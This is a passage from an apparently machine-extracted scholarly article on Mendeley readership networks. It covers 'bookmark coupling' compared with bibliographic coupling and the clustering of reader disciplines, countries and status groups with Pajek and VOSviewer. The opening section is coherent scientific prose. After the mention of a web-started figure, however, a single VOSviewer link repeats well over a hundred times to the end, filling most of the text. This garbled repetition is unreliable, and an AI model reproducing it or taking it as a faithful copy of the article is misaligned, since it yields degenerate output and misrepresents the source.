and status groups. Statistical parameter Disciplinary affiliation Country Status group Number of vertices 465 178 13 Average degree 243.45 76.02 13.00 Degree centralization 0.47 0.54 0.00 Density 0.53 0.43 1.00 Closure 0.72 0.70 1.00 Average distance 1.48 1.58 1.00 Standard deviation of average distance 0.50 0.51 0.00 Diameter 3 3 1 Compactness 0.76 0.71 1.00 Modularity 0.25 0.02 0.00 (c) groups of readers in terms of their countries as provided by Mendeley readers in their profile. The Mendeley bookmarking can be considered as referencing, and then the analysis of this Mendeley data is analogous to bibliographic coupling in bibliometrics (Kessler, 1963). Although being analogous to bibliographic coupling, the bookmark coupling provides different kinds of information in comparison to bibliographic coupling: first, bibliographic coupling is based on the references in the paper, while Mendeley reader counts are similar to times cited data and thus reflect the citing-side (reader-side) perspective. Second, bibliographic coupling captures only authors of papers which are indexed in a citation index. There is no necessary relationship between authoring and reading papers: some people read more literature and author few papers or write more monographs. Bookmark couplings also capture users of Mendeley who author fewer papers or publish in journals which are not indexed in popular citation indices. However, bookmark coupling has another bias, as not everyone uses Mendeley to bookmark papers. Both methods (bibliographic and bookmark coupling) are interesting to analyze networks of publications. They complement each other. In each of the three analyses, the largest component is extracted, and further analyzed using the community finding algorithm of Blondel et al. (2008). Pajek is used for the network analysis. Default values were used during construction and analysis of all networks. All reader counts are weighted equally (Pajek option “unweighted”), and each network connection is counted as a single co-bookmarking event. The results are visualized using VOSviewer. RESULTS Statistical parameters The three networks (disciplinary affiliations, professional status, and countries) presented below are compared in terms of network statistics in Table 1. The network among the 13 status groups is fully connected; but we will discuss the relative weights of the relations Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 4/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.32 in the following. The other two networks are very different in nature, despite the seeming similarity in some of these parameters. Disciplinary affiliations Among the disciplinary affiliations, 470 could be distinguished in this data, of which 465 (98.94%) form a largest component. The five affiliations which were not connected are: “Judaism”, “Catholicism”, “Transport Law”, “Entertainment, Sports and Gaming Law”, and “Air and Space Law”. These five affiliations belong to the humanities (theology and law, respectively). We found a total of three reader counts for “Judaism” and one reader count each for the other four disconnected disciplinary affiliations. Only very few researchers in these disciplines seem to use Mendeley. Similar results have been reported by Jeng, He & Jiang (2015) who reported that they “did not see many group users from the humanities and other related fields” (p. 898). The 465 affiliations in the main component can be sorted into four groupings by the community-finding algorithm of Blondel et al. (2008); the modularity—a measure for the quality of the clustering between zero and one—is Q = 0.25 (cf. Table 1). The four groups are, respectively: 1. 256 affiliations mainly in the social sciences and the humanities (Fig. 1); 2. 71 affiliations in the bio-medical sciences (Fig. 2); 3. 84 affiliations in the natural sciences and engineering (also included in Fig. 2); 4. 54 affiliations in biology and the geo-sciences (not shown separately). Zahedi & Van Eck (2014) have found similar results. They reported that Mendeley users are most active in the biomedical sciences, life sciences, and social sciences. Figure 1 shows 256 sub-discipline affiliations of Mendeley readers (group 1) with their connections in the social sciences and humanities. The network shown in Fig. 1 also includes some reading in the computer sciences and mathematics. The relation seems to be via cognitive psychology, artificial intelligence, etc. The humanities are positioned more at the periphery of this set. The sub-disciplines “Taxation law” and “German language” are not directly connected to this sub-group, but nevertheless sorted into it by the community-finding algorithm. The number of readers providing bookmarks to these sub-disciplines is low. Figure 2 shows 71 sub-discipline affiliations in the bio-medical sciences (group 2) and 84 sub-discipline affiliations in the natural sciences and engineering (group 3). We do not show the links in order to keep the distinction between the two sets of nodes (with different colors) focal to the visualization. A version with the network links visible can be web-started from http://www.vosviewer.com/vosviewer.php?map=http://www. leydesdorff.net/mendeley/fig2 map.txt&network=http://www.leydesdorff.net/mendeley/ fig2 net.txt&n lines=10000 It is somewhat surprising to see the sub-disciplines “regional law” and “Latin” sorted into the network of mainly bio-medical sciences in Fig. 2. As the links in the web-started version show, these bookmarks have many links to several sub-disciplines within the bio-medical network. Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 5/15 https://peerj.com/computer-science/ http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 